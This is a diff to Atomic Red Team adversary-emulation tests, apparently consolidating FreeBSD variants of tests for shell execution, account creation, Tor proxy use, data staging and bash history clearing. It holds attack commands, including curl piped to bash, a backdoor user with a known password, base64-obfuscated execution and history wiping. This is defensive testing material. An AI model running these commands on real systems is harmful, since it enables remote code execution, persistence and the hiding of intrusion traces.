-      - description: 'Check if running on a Debian based machine.
+      - description: 'Check if curl is installed on the machine.
 
           '
-        prereq_command: |
-          if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-        get_prereq_command: 'apt update && apt install -y curl
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
 
           '
-      executor:
-        name: bash
-        elevation_required: false
-        command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
-          |bash\nls -la /tmp/art.txt      \n"
-        cleanup_command: 'rm /tmp/art.txt
-
-          '
-    - name: Detecting pipe-to-shell (freebsd)
-      auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632
-      description: 'An adversary may develop a useful utility or subvert the CI/CD
-        pipe line of a legitimate utility developer, who requires or suggests installing
-        their utility by piping a curl download directly into bash. Of-course this
-        is a very bad idea. The adversary may also take advantage of this BLIND install
-        method and selectively running extra commands in the install script for those
-        who DO pipe to bash and not for those who DO NOT. This test uses curl to download
-        the pipe-to-shell.sh script, the first time without piping it to bash and
-        the second piping it into bash which executes the echo command.
-
-        '
-      supported_platforms:
-      - linux
-      input_arguments:
-        remote_url:
-          description: url of remote payload
-          type: url
-          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Debian based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
-          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-        get_prereq_command: 'pkg update && pkg install -y curl
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
 
           '
       executor:
         name: sh
         elevation_required: false
-        command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
-          |bash\nls -la /tmp/art.txt      \n"
-        cleanup_command: "rm /tmp/art.txt      \n"
+        command: "cd /tmp\ncurl -s #{remote_url} |bash\nls -la /tmp/art.txt      \n"
+        cleanup_command: 'rm /tmp/art.txt
+
+          '
     - name: Current kernel information enumeration
       auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
       description: 'An adversary may want to enumerate the kernel information to tailor
@@ -51646,26 +51427,11 @@ persistence:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -53579,7 +53345,7 @@ command-and-control:
       - 'Network Traffic: Network Connection Creation'
       identifier: T1090.003
     atomic_tests:
-    - name: Tor Proxy Usage - Debian/Ubuntu
+    - name: Tor Proxy Usage - Debian/Ubuntu/FreeBSD
       auto_generated_guid: 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7
       description: "This test is designed to launch the tor proxy service, which is
         what is utilized in the background by the Tor Browser and other applications
@@ -53594,41 +53360,17 @@ command-and-control:
           exit 1; fi
 
           '
-        get_prereq_command: 'sudo apt-get -y install tor
-
-          '
+        get_prereq_command: "(which apt && sudo apt-get -y install tor) || (which
+          pkg && pkg install -y tor)\n"
       executor:
-        command: "sudo systemctl start tor \n"
-        cleanup_command: 'sudo systemctl stop tor
+        command: '[ "$(uname)" = ''FreeBSD'' ] && sysrc tor_enable="YES" && service
+          tor start || sudo systemctl start tor
 
           '
-        name: sh
-        elevation_required: true
-    - name: Tor Proxy Usage - FreeBSD
-      auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a
-      description: "This test is designed to launch the tor proxy service, which is
-        what is utilized in the background by the Tor Browser and other applications
-        with add-ons in order to provide onion routing functionality.\nUpon successful
-        execution, the tor proxy service will be launched. \n"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: "Tor must be installed on the machine \n"
-        prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
-          exit 1; fi
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && service tor stop && sysrc
+          -x tor_enable || sudo systemctl stop tor
 
           '
-        get_prereq_command: 'pkg install -y tor
-
-          '
-      executor:
-        command: |
-          sysrc tor_enable="YES"
-          service tor start
-        cleanup_command: |
-          service tor stop
-          sysrc -x tor_enable
         name: sh
         elevation_required: true
   T1001:
@@ -56239,25 +55981,6 @@ collection:
       supported_platforms:
       - linux
       - macos
-      input_arguments:
-        output_file:
-          description: Location to save downloaded discovery.bat file
-          type: path
-          default: "/tmp/T1074.001_discovery.log"
-      executor:
-        command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
-          | bash -s > #{output_file}
-
-          '
-        name: bash
-    - name: Stage data from Discovery.sh (freebsd)
-      auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46
-      description: 'Utilize curl to download discovery.sh and execute a basic information
-        gathering shell script
-
-        '
-      supported_platforms:
-      - linux
       input_arguments:
         output_file:
           description: Location to save downloaded discovery.bat file
@@ -56265,18 +55988,24 @@ collection:
           default: "/tmp/T1074.001_discovery.log"
       dependency_executor_name: sh
       dependencies:
-      - description: 'Check if curl is installed.
+      - description: 'Check if curl is installed on the machine.
 
           '
-        prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit
-          0; fi;
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
+
+          '
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
 
           '
-        get_prereq_command: "(which pkg && pkg install -y curl)\n"
       executor:
         command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
           | sh -s > #{output_file}
 
+          '
+        cleanup_command: 'rm #{output_file}
+
           '
         name: sh
   T1114.001:
@@ -68728,29 +68457,8 @@ discovery:
 
           '
       executor:
-        command: |
-          lastlog > #{output_file}
-          cat #{output_file}
-        cleanup_command: 'rm -f #{output_file}
-
-          '
-        name: sh
-    - name: Show if a user account has ever logged in remotely (freebsd)
-      auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35
-      description: 'Show if a user account has ever logged in remotely
-
-        '
-      supported_platforms:
-      - linux
-      input_arguments:
-        output_file:
-          description: Path where captured results will be placed
-          type: path
-          default: "/tmp/T1087.001.txt"
-      executor:
-        command: |
-          lastlogin > #{output_file}
-          cat #{output_file}
+        command: "[ \"$(uname)\" = 'FreeBSD' ] && cmd=\"lastlogin\" || cmd=\"lastlog\"
+          \n$cmd > #{output_file}\ncat #{output_file}\n"
         cleanup_command: 'rm -f #{output_file}
 
           '
@@ -81693,26 +81401,11 @@ initial-access:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)

atomics/Indexes/macos-index.yaml

@@ -4322,11 +4322,16 @@ defense-evasion:
       description: 'Clears bash history via rm
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       - macos
       executor:
-        command: 'rm ~/.bash_history
+        command: 'rm #{history_path}
 
           '
         name: sh
@@ -4338,8 +4343,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'cat /dev/null > ~/.bash_history
+        command: 'cat /dev/null > #{history_path}
 
           '
         name: sh
@@ -4351,8 +4361,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'ln -sf /dev/null ~/.bash_history
+        command: 'ln -sf /dev/null #{history_path}
 
           '
         name: sh
@@ -52543,12 +52558,28 @@ collection:
           description: Location to save downloaded discovery.bat file
           type: path
           default: "/tmp/T1074.001_discovery.log"
-      executor:
-        command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
-          | bash -s > #{output_file}
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Check if curl is installed on the machine.
 
           '
-        name: bash
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
+
+          '
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
+
+          '
+      executor:
+        command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
+          | sh -s > #{output_file}
+
+          '
+        cleanup_command: 'rm #{output_file}
+
+          '
+        name: sh
   T1114.001:
     technique:
       x_mitre_platforms:

atomics/T1059.004/T1059.004.md

@@ -26,21 +26,13 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
 
 - [Atomic Test #9 - Obfuscated command line scripts](#atomic-test-9---obfuscated-command-line-scripts)
 
-- [Atomic Test #10 - Obfuscated command line scripts (freebsd)](#atomic-test-10---obfuscated-command-line-scripts-freebsd)
+- [Atomic Test #10 - Change login shell](#atomic-test-10---change-login-shell)
 
-- [Atomic Test #11 - Change login shell](#atomic-test-11---change-login-shell)
+- [Atomic Test #11 - Environment variable scripts](#atomic-test-11---environment-variable-scripts)
 
-- [Atomic Test #12 - Change login shell (freebsd)](#atomic-test-12---change-login-shell-freebsd)
+- [Atomic Test #12 - Detecting pipe-to-shell](#atomic-test-12---detecting-pipe-to-shell)
 
-- [Atomic Test #13 - Environment variable scripts](#atomic-test-13---environment-variable-scripts)
-
-- [Atomic Test #14 - Environment variable scripts (freebsd)](#atomic-test-14---environment-variable-scripts-freebsd)
-
-- [Atomic Test #15 - Detecting pipe-to-shell](#atomic-test-15---detecting-pipe-to-shell)
-
-- [Atomic Test #16 - Detecting pipe-to-shell (freebsd)](#atomic-test-16---detecting-pipe-to-shell-freebsd)
-
-- [Atomic Test #17 - Current kernel information enumeration](#atomic-test-17---current-kernel-information-enumeration)
+- [Atomic Test #13 - Current kernel information enumeration](#atomic-test-13---current-kernel-information-enumeration)
 
 
 <br/>
@@ -360,9 +352,10 @@ An adversary may pre-compute the base64 representations of the terminal commands
 
 
 ```sh
-ART=$(echo -n "id" |base64 -w 0)
+[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
+ART=$(echo -n "id" | $encodecmd)
 echo "\$ART=$ART"
-echo -n "$ART" |base64 -d |/bin/bash
+echo -n "$ART" | $decodecmd |/bin/bash
 unset ART
 ```
 
@@ -374,38 +367,7 @@ unset ART
 <br/>
 <br/>
 
-## Atomic Test #10 - Obfuscated command line scripts (freebsd)
-An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 5dc1d9dd-f396-4420-b985-32b1c4f79062
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-ART=$(echo -n "id" |b64encode -r -)
-echo "\$ART=$ART"
-echo -n "$ART" |b64decode -r |/bin/sh
-unset ART
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Change login shell
+## Atomic Test #10 - Change login shell
 An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
 
 **Supported Platforms:** Linux
@@ -422,7 +384,7 @@ An adversary may want to use a different login shell. The chsh command changes t
 
 
 ```bash
-useradd -s /bin/bash art
+[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
 cat /etc/passwd |grep ^art
 chsh -s /bin/sh art
 cat /etc/passwd |grep ^art
@@ -430,7 +392,7 @@ cat /etc/passwd |grep ^art
 
 #### Cleanup Commands:
 ```bash
-userdel art
+[ "$(uname)" = 'FreeBSD' ] && rmuser -y art || userdel art
 ```
 
 
@@ -452,54 +414,7 @@ echo "Automated installer not implemented yet, please install chsh manually"
 <br/>
 <br/>
 
-## Atomic Test #12 - Change login shell (freebsd)
-An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 33b68b9b-4988-4caf-9600-31b7bf04227c
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-pw useradd art -g wheel -s /bin/csh
-cat /etc/passwd |grep ^art
-chsh -s /bin/sh art
-cat /etc/passwd |grep ^art
-```
-
-#### Cleanup Commands:
-```sh
-rmuser -y art
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: chsh - change login shell, must be installed
-##### Check Prereq Commands:
-```sh
-if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit 1"; exit 1; fi
-```
-##### Get Prereq Commands:
-```sh
-echo "Automated installer not implemented yet, please install chsh manually"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - Environment variable scripts
+## Atomic Test #11 - Environment variable scripts
 An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
 
 **Supported Platforms:** Linux
@@ -512,39 +427,6 @@ An adversary may place scripts in an environment variable because they can't or
 
 
 
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-export ART='echo "Atomic Red Team was here... T1059.004"'
-echo $ART |/bin/bash
-```
-
-#### Cleanup Commands:
-```bash
-unset ART
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #14 - Environment variable scripts (freebsd)
-An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 663b205d-2121-48a3-a6f9-8c9d4d87dfee
-
-
-
-
-
-
 #### Attack Commands: Run with `sh`! 
 
 
@@ -565,7 +447,7 @@ unset ART
 <br/>
 <br/>
 
-## Atomic Test #15 - Detecting pipe-to-shell
+## Atomic Test #12 - Detecting pipe-to-shell
 An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
 
 **Supported Platforms:** Linux
@@ -583,34 +465,31 @@ An adversary may develop a useful utility or subvert the CI/CD pipe line of a le
 | remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh|
 
 
-#### Attack Commands: Run with `bash`! 
+#### Attack Commands: Run with `sh`! 
 
 
-```bash
+```sh
 cd /tmp
-curl -s #{remote_url}
-ls -la /tmp/art.txt
 curl -s #{remote_url} |bash
 ls -la /tmp/art.txt
 ```
 
 #### Cleanup Commands:
-```bash
+```sh
 rm /tmp/art.txt
 ```
 
 
 
 #### Dependencies:  Run with `bash`!
-##### Description: Check if running on a Debian based machine.
+##### Description: Check if curl is installed on the machine.
 ##### Check Prereq Commands:
 ```bash
-if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
 if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```bash
-apt update && apt install -y curl
+which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl
 ```
 
 
@@ -619,61 +498,7 @@ apt update && apt install -y curl
 <br/>
 <br/>
 
-## Atomic Test #16 - Detecting pipe-to-shell (freebsd)
-An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 1a06b1ec-0cca-49db-a222-3ebb6ef25632
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cd /tmp
-curl -s #{remote_url}
-ls -la /tmp/art.txt
-curl -s #{remote_url} |bash
-ls -la /tmp/art.txt
-```
-
-#### Cleanup Commands:
-```sh
-rm /tmp/art.txt
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if running on a Debian based machine.
-##### Check Prereq Commands:
-```sh
-if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
-if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-```
-##### Get Prereq Commands:
-```sh
-pkg update && pkg install -y curl
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #17 - Current kernel information enumeration
+## Atomic Test #13 - Current kernel information enumeration
 An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
 
 **Supported Platforms:** Linux

atomics/T1070.003/T1070.003.md

@@ -18,41 +18,27 @@ Adversaries may run the PowerShell command <code>Clear-History</code> to flush t
 
 - [Atomic Test #1 - Clear Bash history (rm)](#atomic-test-1---clear-bash-history-rm)
 
-- [Atomic Test #2 - Clear sh history (rm)](#atomic-test-2---clear-sh-history-rm)
+- [Atomic Test #2 - Clear Bash history (echo)](#atomic-test-2---clear-bash-history-echo)
 
-- [Atomic Test #3 - Clear Bash history (echo)](#atomic-test-3---clear-bash-history-echo)
+- [Atomic Test #3 - Clear Bash history (cat dev/null)](#atomic-test-3---clear-bash-history-cat-devnull)
 
-- [Atomic Test #4 - Clear sh history (echo)](#atomic-test-4---clear-sh-history-echo)
+- [Atomic Test #4 - Clear Bash history (ln dev/null)](#atomic-test-4---clear-bash-history-ln-devnull)
 
-- [Atomic Test #5 - Clear Bash history (cat dev/null)](#atomic-test-5---clear-bash-history-cat-devnull)
+- [Atomic Test #5 - Clear Bash history (truncate)](#atomic-test-5---clear-bash-history-truncate)
 
-- [Atomic Test #6 - Clear sh history (cat dev/null)](#atomic-test-6---clear-sh-history-cat-devnull)
+- [Atomic Test #6 - Clear history of a bunch of shells](#atomic-test-6---clear-history-of-a-bunch-of-shells)
 
-- [Atomic Test #7 - Clear Bash history (ln dev/null)](#atomic-test-7---clear-bash-history-ln-devnull)
+- [Atomic Test #7 - Clear and Disable Bash History Logging](#atomic-test-7---clear-and-disable-bash-history-logging)
 
-- [Atomic Test #8 - Clear sh history (ln dev/null)](#atomic-test-8---clear-sh-history-ln-devnull)
+- [Atomic Test #8 - Use Space Before Command to Avoid Logging to History](#atomic-test-8---use-space-before-command-to-avoid-logging-to-history)
 
-- [Atomic Test #9 - Clear Bash history (truncate)](#atomic-test-9---clear-bash-history-truncate)
+- [Atomic Test #9 - Disable Bash History Logging with SSH -T](#atomic-test-9---disable-bash-history-logging-with-ssh--t)
 
-- [Atomic Test #10 - Clear sh history (truncate)](#atomic-test-10---clear-sh-history-truncate)
+- [Atomic Test #10 - Prevent Powershell History Logging](#atomic-test-10---prevent-powershell-history-logging)
 
-- [Atomic Test #11 - Clear history of a bunch of shells](#atomic-test-11---clear-history-of-a-bunch-of-shells)
+- [Atomic Test #11 - Clear Powershell History by Deleting History File](#atomic-test-11---clear-powershell-history-by-deleting-history-file)
 
-- [Atomic Test #12 - Clear history of a bunch of shells (freebsd)](#atomic-test-12---clear-history-of-a-bunch-of-shells-freebsd)
-
-- [Atomic Test #13 - Clear and Disable Bash History Logging](#atomic-test-13---clear-and-disable-bash-history-logging)
-
-- [Atomic Test #14 - Use Space Before Command to Avoid Logging to History](#atomic-test-14---use-space-before-command-to-avoid-logging-to-history)
-
-- [Atomic Test #15 - Disable Bash History Logging with SSH -T](#atomic-test-15---disable-bash-history-logging-with-ssh--t)
-
-- [Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd)](#atomic-test-16---disable-sh-history-logging-with-ssh--t-freebsd)
-
-- [Atomic Test #17 - Prevent Powershell History Logging](#atomic-test-17---prevent-powershell-history-logging)
-
-- [Atomic Test #18 - Clear Powershell History by Deleting History File](#atomic-test-18---clear-powershell-history-by-deleting-history-file)
-
-- [Atomic Test #19 - Set Custom AddToHistoryHandler to Avoid History File Logging](#atomic-test-19---set-custom-addtohistoryhandler-to-avoid-history-file-logging)
+- [Atomic Test #12 - Set Custom AddToHistoryHandler to Avoid History File Logging](#atomic-test-12---set-custom-addtohistoryhandler-to-avoid-history-file-logging)
 
 
 <br/>
@@ -69,12 +55,17 @@ Clears bash history via rm
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-rm ~/.bash_history
+rm #{history_path}
 ```
 
 
@@ -85,35 +76,7 @@ rm ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #2 - Clear sh history (rm)
-Clears sh history via rm
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 448893f8-1d5d-4ae2-9017-7fcd73a7e100
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-rm ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Clear Bash history (echo)
+## Atomic Test #2 - Clear Bash history (echo)
 Clears bash history via echo
 
 **Supported Platforms:** Linux
@@ -125,12 +88,17 @@ Clears bash history via echo
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-echo "" > ~/.bash_history
+echo "" > #{history_path}
 ```
 
 
@@ -141,35 +109,7 @@ echo "" > ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #4 - Clear sh history (echo)
-Clears sh history via echo
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-echo "" > ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Clear Bash history (cat dev/null)
+## Atomic Test #3 - Clear Bash history (cat dev/null)
 Clears bash history via cat /dev/null
 
 **Supported Platforms:** Linux, macOS
@@ -181,12 +121,17 @@ Clears bash history via cat /dev/null
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-cat /dev/null > ~/.bash_history
+cat /dev/null > #{history_path}
 ```
 
 
@@ -197,35 +142,7 @@ cat /dev/null > ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #6 - Clear sh history (cat dev/null)
-Clears sh history via cat /dev/null
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cat /dev/null > ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Clear Bash history (ln dev/null)
+## Atomic Test #4 - Clear Bash history (ln dev/null)
 Clears bash history via a symlink to /dev/null
 
 **Supported Platforms:** Linux, macOS
@@ -237,12 +154,17 @@ Clears bash history via a symlink to /dev/null
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-ln -sf /dev/null ~/.bash_history
+ln -sf /dev/null #{history_path}
 ```
 
 
@@ -253,35 +175,7 @@ ln -sf /dev/null ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #8 - Clear sh history (ln dev/null)
-Clears sh history via a symlink to /dev/null
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 3126aa7a-8768-456f-ae05-6ab2d4accfdd
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-ln -sf /dev/null ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Clear Bash history (truncate)
+## Atomic Test #5 - Clear Bash history (truncate)
 Clears bash history via truncate
 
 **Supported Platforms:** Linux
@@ -293,12 +187,17 @@ Clears bash history via truncate
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-truncate -s0 ~/.bash_history
+truncate -s0 #{history_path}
 ```
 
 
@@ -309,35 +208,7 @@ truncate -s0 ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #10 - Clear sh history (truncate)
-Clears sh history via truncate
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** e14d9bb0-c853-4503-aa89-739d5c0a5818
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-truncate -s0 ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Clear history of a bunch of shells
+## Atomic Test #6 - Clear history of a bunch of shells
 Clears the history of a bunch of different shell types by setting the history size to zero
 
 **Supported Platforms:** Linux, macOS
@@ -367,39 +238,7 @@ history -c
 <br/>
 <br/>
 
-## Atomic Test #12 - Clear history of a bunch of shells (freebsd)
-Clears the history of a bunch of different shell types by setting the history size to zero
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-unset HISTFILE
-unset histfile
-export HISTFILESIZE=0
-export HISTSIZE=0
-history -c
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - Clear and Disable Bash History Logging
+## Atomic Test #7 - Clear and Disable Bash History Logging
 Clears the history and disable bash history logging of the current shell and future shell sessions
 
 **Supported Platforms:** Linux, macOS
@@ -436,7 +275,7 @@ set -o history
 <br/>
 <br/>
 
-## Atomic Test #14 - Use Space Before Command to Avoid Logging to History
+## Atomic Test #8 - Use Space Before Command to Avoid Logging to History
 Using a space before a command causes the command to not be logged in the Bash History file
 
 **Supported Platforms:** Linux, macOS
@@ -465,7 +304,7 @@ whoami
 <br/>
 <br/>
 
-## Atomic Test #15 - Disable Bash History Logging with SSH -T
+## Atomic Test #9 - Disable Bash History Logging with SSH -T
 Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
 
